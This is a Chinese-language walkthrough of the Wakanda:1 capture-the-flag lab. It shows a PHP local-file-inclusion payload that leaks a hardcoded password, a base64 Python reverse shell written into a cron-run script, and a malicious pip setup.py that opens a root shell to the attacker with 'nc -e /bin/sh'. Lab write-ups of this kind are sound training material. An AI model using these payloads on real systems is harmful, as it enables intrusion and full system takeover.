环境介绍:
名称:wakanda:1
日期:2018年8月5日
作者:xMagass
系列:wakanda
说明:一个新的Vibranium市场将很快在暗网上上线。您的目标,获取包含矿井确切位置的根文件。
中级水平
标志:有三个标志(flag1.txt,flag2.txt,root.txt)
DHCP:已启用
IP地址:自动分配
提示:遵循你的直觉……并列举!
信息搜集
还是使用namp…
获取目标端口信息
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
|
$ nmap -sC -sV -vv -p- 192.168.123.11
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-01 05:20 CST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:20
Completed NSE at 05:20, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:20
Completed NSE at 05:20, 0.00s elapsed
Initiating ARP Ping Scan at 05:20
Scanning 192.168.123.11 [1 port]
Completed ARP Ping Scan at 05:20, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 05:20
Completed Parallel DNS resolution of 1 host. at 05:20, 0.00s elapsed
Initiating SYN Stealth Scan at 05:20
Scanning Wakanda1.lan (192.168.123.11) [65535 ports]
Discovered open port 80/tcp on 192.168.123.11
Discovered open port 111/tcp on 192.168.123.11
Discovered open port 3333/tcp on 192.168.123.11
Discovered open port 33517/tcp on 192.168.123.11
Completed SYN Stealth Scan at 05:20, 1.88s elapsed (65535 total ports)
Initiating Service scan at 05:20
Scanning 4 services on Wakanda1.lan (192.168.123.11)
Completed Service scan at 05:21, 11.01s elapsed (4 services on 1 host)
NSE: Script scanning 192.168.123.11.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:21
Completed NSE at 05:21, 0.26s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:21
Completed NSE at 05:21, 0.01s elapsed
Nmap scan report for Wakanda1.lan (192.168.123.11)
Host is up, received arp-response (0.00038s latency).
Scanned at 2018-11-01 05:20:52 CST for 13s
Not shown: 65531 closed ports
Reason: 65531 resets
PORT STATE SERVICE REASON VERSION
80/tcp open http syn-ack ttl 64 Apache httpd 2.4.10 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Vibranium Market
111/tcp open rpcbind syn-ack ttl 64 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100024 1 33517/tcp status
|_ 100024 1 46783/udp status
3333/tcp open ssh syn-ack ttl 64 OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0)
| ssh-hostkey:
| 1024 1c:98:47:56:fc:b8:14:08:8f:93:ca:36:44:7f:ea:7a (DSA)
| ssh-dss AAAAB3NzaC1kc3MAAACBALuX0c3aQkbpbr2XkpVu/e9JzVTxIuE2JgFrg9680cM8EddLM+SYUh850nz9kGExllI1qOp0tlItrfju5z5LagpaQatQRuPGfGiOTDNA/22Fffwh/Akf/ifcm+O2+0A4jRvqmewJgGTnajhM/LVi8SN3hayQIJiCKjDWtvMr0qYHAAAAFQCiAX+fCFMJYDpIXmqS4GAoEF0PawAAAIBjo9/eh9Bt0BJQPOId7PfkV+gmz2ucqQWgtnBvPMQcY129Qo3v+wqfW3fPJnjao2Gw63piG4YbMG3t60zBwG/kS4U37yYx8dP2D3hMQ4J/8O9LlzuYaiZ07rbU47+9u42jd+YmLKIZVrHjNsOAVg7D4ssItg6X5+DrXOL0mXYB3AAAAIB9U1hqMz26a4Socu8/iKEN9JlxicoQona9U4TLLYvSEgZHLHACaAMH659WcAagNYmRTpPFAbAaAd5Igb0wCRhwpwbG1DzopHoI4pWu++TC9di8d+Z4cSnpJkHFXTJmK7XC/ULeTx2VSpvGCm+GRzFek3QUV8ggzOvCs9VDDDGbjQ==
| 2048 f1:d5:04:78:d3:3a:9b:dc:13:df:0f:5f:7f:fb:f4:26 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDRjfzpA+CV4EJgn9wbtHUFbmbqmhCDW4SbJHQrwKO5+RHMReBmxFepMfExiJbxhegI4EUIkGQY6vaXgOE7JQJk75JF1VDEcYTjiFyL/0uE5xn6yOLbge0h3JIsaq2OaWDQVLptJVecdzxRIFspqqxgBP8dOtbkLA9W/Zn2mHSZPmWXWE4aX6Zd1fdQjPRmp/KsAr0eTjIk8Q8uJDVWVgeGIKo2h+j2sfyiRwa4nnb06LaREJWF68gmOD6ZqxXdLUmQYrDMoRhXm19GdKawxuAKCOtMQzxO7uHMsO9gNWuZpojGRRWJixtAyKHNuNBjHgjqZPXiCVYj2SeWICKDj0a3
| 256 d8:34:41:5d:9b:fe:51:bc:c6:4e:02:14:5e:e1:08:c5 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBPsWvoFYGwdjNaS+s90Z2ypQ5CdYCn/Zpkd8+Ttj3ZtlcXbXLeRCw/m+tiWxr5LC/mEb/eASQNfrgz+GGxv9PLM=
| 256 0e:f5:8d:29:3c:73:57:c7:38:08:6d:50:84:b6:6c:27 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPEZdWqHobn5ZGxrsRK+oIbr3qIHE8hDTporoVOz8pf2
33517/tcp open status syn-ack ttl 64 1 (RPC #100024)
MAC Address: 08:00:27:45:76:FD (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 05:21
Completed NSE at 05:21, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 05:21
Completed NSE at 05:21, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.01 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
|
` * 发现开的端口很多很多,惯性思维80开始。
扫描目录信息
这次我们使用dirb吧,方便迅速。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
|
$ dirb http://192.168.123.11/
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Thu Nov 1 05:22:15 2018
URL_BASE: http://192.168.123.11/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.123.11/ ----
+ http://192.168.123.11/admin (CODE:200|SIZE:0)
+ http://192.168.123.11/backup (CODE:200|SIZE:0)
+ http://192.168.123.11/index.php (CODE:200|SIZE:1527)
+ http://192.168.123.11/secret (CODE:200|SIZE:0)
+ http://192.168.123.11/server-status (CODE:403|SIZE:302)
+ http://192.168.123.11/shell (CODE:200|SIZE:0)
-----------------
END_TIME: Thu Nov 1 05:22:17 2018
DOWNLOADED: 4612 - FOUND: 6
|
审查代码信息
打开http://192.168.123.11发现没什么突破口,没上传,没登录,没注册,查看源码发现一段注释很有意思。
1
|
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
|
远程包含漏洞利用
根据万能的搜索与经验,发现这很有可能是一个文件包含漏洞,打开burpsuite测试成功。
poc
http://192.168.123.11/?lang=php://filter/convert.base64-encode/resource=index
回显
1
|
PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=
|
base64解码。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
|
<?php
$password ="Niamey4Ever227!!!" ;//I have to remember it
if (isset($_GET['lang']))
{
include($_GET['lang'].".php");
}
?>
<!DOCTYPE html>
<html lang="en"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
<meta name="description" content="Vibranium market">
<meta name="author" content="mamadou">
<title>Vibranium Market</title>
<link href="bootstrap.css" rel="stylesheet">
<link href="cover.css" rel="stylesheet">
</head>
<body class="text-center">
<div class="cover-container d-flex w-100 h-100 p-3 mx-auto flex-column">
<header class="masthead mb-auto">
<div class="inner">
<h3 class="masthead-brand">Vibranium Market</h3>
<nav class="nav nav-masthead justify-content-center">
<a class="nav-link active" href="#">Home</a>
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
</nav>
</div>
</header>
<main role="main" class="inner cover">
<h1 class="cover-heading">Coming soon</h1>
<p class="lead">
<?php
if (isset($_GET['lang']))
{
echo $message;
}
else
{
?>
Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned!
<?php
}
?>
</p>
<p class="lead">
<a href="#" class="btn btn-lg btn-secondary">Learn more</a>
</p>
</main>
<footer class="mastfoot mt-auto">
<div class="inner">
<p>Made by<a href="#">@mamadou</a></p>
</div>
</footer>
</div>
</body></html>
|
发现一个了点东西。
- 密码:Niamey4Ever227!!!
- 用户名:mamadou
获取第一个flag
通过ssh尝试登录。
1
2
3
4
5
6
7
8
9
10
11
12
13
|
$ ssh [email protected] -p 3333
[email protected]'s password:
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Oct 31 17:40:36 2018 from 192.168.123.122
Python 2.7.9 (default, Jun 29 2016, 13:08:31)
[GCC 4.9.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
|
我们切换回bash,并获取地一个flag。
1
2
3
4
5
6
7
|
>>> import pty
>>> pty.spawn('/bin/bash')
mamadou@Wakanda1:~$ ls
flag1.txt
mamadou@Wakanda1:~$ cat flag1.txt
Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
|
提权
系统信息搜集
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
|
mamadou@Wakanda1:~$ cat /etc/passwd
root❌0:0:root:/root:/bin/bash
daemon❌1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin❌2:2:bin:/bin:/usr/sbin/nologin
sys❌3:3:sys:/dev:/usr/sbin/nologin
sync❌4:65534:sync:/bin:/bin/sync
games❌5:60:games:/usr/games:/usr/sbin/nologin
man❌6:12:man:/var/cache/man:/usr/sbin/nologin
lp❌7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail❌8:8:mail:/var/mail:/usr/sbin/nologin
news❌9:9:news:/var/spool/news:/usr/sbin/nologin
uucp❌10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy❌13:13:proxy:/bin:/usr/sbin/nologin
www-data❌33:33:www-data:/var/www:/usr/sbin/nologin
backup❌34:34:backup:/var/backups:/usr/sbin/nologin
list❌38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc❌39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats❌41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody❌65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync❌100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network❌101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve❌102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy❌103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
Debian-exim❌104:109::/var/spool/exim4:/bin/false
messagebus❌105:110::/var/run/dbus:/bin/false
statd❌106:65534::/var/lib/nfs:/bin/false
avahi-autoipd❌107:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
sshd❌108:65534::/var/run/sshd:/usr/sbin/nologin
mamadou❌1000:1000:Mamadou,,,,Developper:/home/mamadou:/usr/bin/python
devops❌1001:1002:,,,:/home/devops:/bin/bash
|
第二个用户
我们切换到用户目录,查看有没有可写文件。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
|
mamadou@Wakanda1:/home$ cd /home
mamadou@Wakanda1:/home$ ls
devops mamadou
mamadou@Wakanda1:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Aug 1 15:23 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 ..
drwxr-xr-x 2 devops developer 4096 Aug 5 02:25 devops
drwxr-xr-x 2 mamadou mamadou 4096 Oct 23 11:28 mamadou
mamadou@Wakanda1:/home$ cd devops/
mamadou@Wakanda1:/home/devops$ ls -la
total 24
drwxr-xr-x 2 devops developer 4096 Aug 5 02:25 .
drwxr-xr-x 4 root root 4096 Aug 1 15:23 ..
lrwxrwxrwx 1 root root 9 Aug 5 02:25 .bash_history -> /dev/null
-rw-r--r-- 1 devops developer 220 Aug 1 15:23 .bash_logout
-rw-r--r-- 1 devops developer 3515 Aug 1 15:23 .bashrc
-rw-r--r-- 1 devops developer 675 Aug 1 15:23 .profile
-rw-r----- 1 devops developer 42 Aug 1 15:57 flag2.txt
mamadou@Wakanda1:/home/devops$ cat flag2.txt
cat: flag2.txt: Permission denied
|
搜索devops的文件信息
1
2
3
4
5
6
7
|
mamadou@Wakanda1:/home/devops$ find / -user devops 2>/dev/null
/srv/.antivirus.py
/home/devops
/home/devops/.bashrc
/home/devops/.profile
/home/devops/.bash_logout
/home/devops/flag2.txt
|
我们查看相关目录和文件信息。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
|
mamadou@Wakanda1:/home/devops$ cd /srv/
mamadou@Wakanda1:/srv$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Aug 1 17:52 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 ..
-rw-r--rw- 1 devops developer 256 Oct 23 11:28 .antivirus.py
mamadou@Wakanda1:/srv$ cat .antivirus.py
pen('/tmp/test','w').write('test')
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.1.122",1))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])
|
- 发现.antivirus.py是一个定时运行文件,而且写。
反弹shell
为了效率,我们使用msf反弹吧。
开启nc监听
$ nc -vlp 2733
生成payload
1
2
3
4
5
6
|
$ msfvenom -p cmd/unix/reverse_python lhost=192.168.123.122 lport=2733 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 497 bytes
python -c "exec('aW1wb3J0IHNvY2tldCAgICAsICAgc3VicHJvY2VzcyAgICAsICAgb3MgICAgICA7ICBob3N0PSIxOTIuMTY4LjEyMy4xMjIiICAgICAgOyAgcG9ydD0yNzMzICAgICAgOyAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICwgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgOyAgcy5jb25uZWN0KChob3N0ICAgICwgICBwb3J0KSkgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgIDApICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAxKSAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAgMikgICAgICA7ICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))"
|
写入.antivirus.py
1
|
exec('aW1wb3J0IHNvY2tldCAgICAsICAgc3VicHJvY2VzcyAgICAsICAgb3MgICAgICA7ICBob3N0PSIxOTIuMTY4LjEyMy4xMjIiICAgICAgOyAgcG9ydD0yNzMzICAgICAgOyAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVUICAgICwgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgOyAgcy5jb25uZWN0KChob3N0ICAgICwgICBwb3J0KSkgICAgICA7ICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgIDApICAgICAgOyAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAxKSAgICAgIDsgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAgMikgICAgICA7ICBwPXN1YnByb2Nlc3MuY2FsbCgiL2Jpbi9iYXNoIik='.decode('base64'))
|
*等待一会儿即可反弹成功。
切换bash模式
1
2
3
4
5
|
connect to [192.168.123.122] from (UNKNOWN) [192.168.123.11] 52448
python -c 'import pty; pty.spawn("/bin/sh")'
$ /bin/bash
/bin/bash
devops@Wakanda1:/$
|
获取到第二个flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
devops@Wakanda1:/home$ cd devops
cd devops
devops@Wakanda1:~$ ls
ls
flag2.txt
devops@Wakanda1:~$ cat flag2.txt
cat flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
devops@Wakanda1:~$ cd /home/devops
cd /home/devops
devops@Wakanda1:~$ ls
ls
flag2.txt
devops@Wakanda1:~$ cat flag2.txt
cat flag2.txt
Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
|
*然而并无root权限,搜索了下可以使用pip提权。
pip提权
介绍:https://github.com/0x00-0x00/FakePip
payload更改为以下内容
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
|
from setuptools import setup
from setuptools.command.install import install
import os
class CustomInstall(install):
def run(self):
install.run(self)
os.system('nc -e /bin/sh 192.168.123.122 8443')
setup(name='FakePip',
version='0.0.1',
description='This will exploit a sudoer able to /usr/bin/pip install *',
url='https://github.com/0x00-0x00/fakepip',
author='zc00l',
author_email='[email protected]',
license='MIT',
zip_safe=False,
cmdclass={'install':CustomInstall})
|
payload运行
在本地开启web服务
1
|
python -m SimpleHTTPServer 8033
|
在第二个用户下载。
1
2
3
4
5
6
7
8
9
|
devops@Wakanda1:/tmp/fakepip$ wget http://192.168.123.122:8033/setup.py
wget http://192.168.123.122:8033/setup.py
--2018-10-31 19:19:37-- http://192.168.123.122:8033/setup.py
Connecting to 192.168.123.122:8033... connected.
HTTP request sent, awaiting response... 200 OK
Length: 552 [text/plain]
Saving to: ‘setup.py’
setup.py 100%[=====================>] 552 --.-KB/s in 0s
|
开启nc监听
运行:
devops@Wakanda1:/tmp/fakepip$ sudo /usr/bin/pip install . --upgrade --force-reinstall
获取第三个flag
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
|
$ nc -vlp 8443
listening on [any] 8443 ...
192.168.123.11: inverse host lookup failed: Unknown host
connect to [192.168.123.122] from (UNKNOWN) [192.168.123.11] 51766
python -c 'import pty;pty.spawn("/bin/bash");'
root@Wakanda1:/tmp/pip-OWieiY-build## cd /root
cd /root
root@Wakanda1:~## ls -la
ls -la
total 24
drwx------ 3 root root 4096 Oct 31 19:02 .
drwxr-xr-x 22 root root 4096 Aug 1 13:05 ..
-rw-r--r-- 1 root root 570 Jan 31 2010 .bashrc
drwxr-xr-x 2 root root 4096 Oct 31 19:02 .pip
-rw-r--r-- 1 root root 140 Nov 19 2007 .profile
-rw-r----- 1 root root 429 Aug 1 15:16 root.txt
root@Wakanda1:~## cat root.txt
cat root.txt
_ _.--.____.--._
( )=.-":;:;:;;':;:;:;"-._
\\\:;:;:;:;:;;:;::;:;:;:\
\\\:;:;:;:;:;;:;:;:;:;:;\
\\\:;::;:;:;:;:;::;:;:;:\
\\\:;:;:;:;:;;:;::;:;:;:\
\\\:;::;:;:;:;:;::;:;:;:\
\\\;;:;:_:--:_:_:--:_;:;\
\\\_.-" "-._\
\\
\\
\\
\\ Wakanda 1 - by @xMagass
\\
\\
Congratulations You are Root!
821ae63dbe0c573eff8b69d451fb21bc
|
心得
这个环境很给力,学到了一种新的提权姿势。
